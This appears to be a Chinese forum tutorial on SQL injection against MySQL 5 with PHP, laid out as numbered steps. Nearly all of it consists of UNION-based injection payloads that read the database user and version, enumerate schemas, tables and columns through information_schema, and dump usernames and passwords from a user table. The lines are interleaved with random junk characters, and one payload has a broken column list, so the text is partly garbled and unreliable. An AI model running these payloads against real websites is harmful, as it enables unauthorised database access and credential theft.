; R3 \! W5 F. Q1 j$ J8 _6 l* W7 H教程内容:Mysql 5+php 注入
% f% x, n) F7 O; }% o9 b' r7 K. U I' D p' _6 m& ?
9 J# B0 A4 ?/ N, h" Z1 L) f/ C3 J/ ], ]4 ?8 l
一.查看MYSQL基本信息(库名,版本,用户)8 ~4 g, u/ s( x1 f" m$ {6 A
& E: F8 u+ V* w; zand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*2 W% W) U6 M% w( Z$ N* l
I% A6 k- m3 m0 ~; Z) p! Z
二.查数据库' {: l: i3 h5 ?* l: _6 ]
5 E: a4 Q5 E1 h6 l5 J3 y3 l
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*3 ^- q. t% G% N: y; b
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。: z" m( r$ m0 ~" u& Q+ p! s
3 F$ `2 H) E* o0 `6 u# ^; q三.暴表8 W- M. k5 y" `3 W# w! W% g
; j* w/ ?2 b' r4 r" k
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
2 l7 o8 q6 h8 h# m
/ g5 C0 z' l- M. o2 qlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
9 `; g! s$ \( N- s
: U- W( O% K" E9 R s4 t5 N, [" b四.暴字段 t2 x* A% O' { `! @! [
0 ?+ x# ` P& o- x9 h! m
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
, j" d; P- c! _& W3 i
9 w7 l+ c) e( F3 S" u5 y S4 |limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。+ j* J$ s/ ~$ P$ x( v, ]
$ f" p# X! X" p% t6 ^' _2 j
五.暴数据
; z( B$ r( W1 W+ d! [8 O& B4 r: s. ^" Z: t# Q/ V1 U$ x
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
% y4 J; i$ O2 M( W8 Y3 o/ `* B+ X) C- t; K" ? M0 h7 j9 e
4 T6 I9 `- Z) p9 ?
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
0 N' t6 @+ E! M6 T- T& e |